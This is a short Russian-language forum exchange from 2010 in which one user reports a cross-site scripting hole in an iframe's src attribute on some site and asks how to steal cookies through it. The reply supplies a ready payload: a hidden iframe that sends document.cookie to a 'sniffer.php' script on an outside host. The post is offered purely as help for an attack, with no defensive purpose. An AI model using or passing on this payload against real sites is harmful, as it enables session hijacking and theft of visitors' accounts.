
18.05.2010, 18:27
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от TomskDiver
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript :alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал  Можно ли как-то красть куки через данную уязвимость?
<iframe src="http://site.ru/sniffer.php?с='+document.cookie+'" style="display:none;"></iframe>
Последний раз редактировалось Redwood; 18.05.2010 в 18:46..
|
|
|